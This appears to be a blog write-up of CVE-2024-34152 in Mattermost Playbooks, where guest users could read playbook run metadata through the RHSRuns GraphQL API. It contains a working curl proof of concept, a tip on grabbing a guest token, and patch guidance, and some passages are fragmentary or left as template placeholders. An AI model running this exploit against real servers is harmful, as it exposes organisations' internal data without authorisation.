In May 2024, a significant vulnerability was found in Mattermost, a popular self-hosted messaging platform used by many businesses and open-source communities. Cataloged as CVE-2024-34152, this security flaw allows a guest user (someone with limited access) to fetch sensitive playbook run metadata just by sending a GraphQL query, even if they shouldn’t be able to see this information.
8.1.x ≤ 8.1.12
If you’re running Mattermost, keep reading to understand the issue, see how it works, and learn how to protect your users and data.
Understanding the Bug
Mattermost has a Playbooks feature, which helps teams track software incidents and other operational workflows. Each time you use a playbook, it creates a "run" instance. Sensitive data—like names, creators, timestamps, etc.—is stored as "playbook run metadata".
Mattermost allows guests to access public channels, but it should not allow them to poke into playbook runs they don't own or control. Unfortunately, versions listed above fail to check if a guest should see the metadata for a playbook run if that run is *linked* to a channel the guest can access.
A guest user can simply fire a query using the RHSRuns GraphQL API and Mattermost will happily reveal info it shouldn’t.
The guest sends a standardized RHSRuns GraphQL query to the Mattermost server.
4. The server responds with metadata about these playbook runs—creator, creation date, and maybe more.
Here’s a proof-of-concept code snippet using curl to extract playbook run metadata as a guest
curl -k \
-H "Authorization: Bearer <GUEST_USER_TOKEN>" \
-H "Content-Type: application/json" \
-X POST https://<mattermost-domain>/plugins/playbooks/api/v/graphql \
-d '{
"query": "query RHSRuns($teamID: String!, $channelID: String!) { rhsRuns(teamID: $teamID, channelID: $channelID) { id name createdAt createdBy } }",
"variables": {
"teamID": "<TEAM_ID>",
"channelID": "<CHANNEL_ID>"
}
}'
Replace
- <GUEST_USER_TOKEN> with the actual guest account token (easily grabbed via Chrome DevTools after login).
<mattermost-domain> with your Mattermost server address.
- <TEAM_ID> and <CHANNEL_ID> with correct IDs (these are typically visible to any member of the team/channel).
A more readable query would look like this via some GraphQL client
query GetPlaybookRuns($teamID: String!, $channelID: String!) {
rhsRuns(teamID: $teamID, channelID: $channelID) {
id
name
createdAt
createdBy
}
}
The server responds with metadata for *all* runs in that channel—even for those a guest *should not* see.
Why Does This Matter?
- Metadata can be sensitive: Playbook runs might include incident names, timestamps, descriptions, or creators.
- Information leaks can lead to social engineering: Attackers can map out teams, who authored key workflows, and get insight into incident types and workflows.
- Guest accounts are often less scrutinized: Attackers can pose as external consultants or users, gaining info stealthily.
References
- Official Mattermost Security Advisory
- GitHub commit fixing the issue *(If available, replace with actual URL)*
- CVE-2024-34152 at NVD
Mattermost 9.5.4, 9.6.2, 8.1.13 or later
- Latest releases: Mattermost Download Center
Conclusion
CVE-2024-34152 is a great example of how small permission-checking mistakes can cause big problems. It’s also a reminder that "metadata" isn’t harmless—sometimes it leaks more than you think.
If you’re using Mattermost Playbooks, especially with external or guest users: patch now. If you’re interested in responsible disclosure or want to dive deeper, make sure to check the official security advisories linked above.
Stay safe and always keep your software up to date!
Timeline
Published on: 05/26/2024 14:15:09 UTC
Last modified on: 05/28/2024 12:39:28 UTC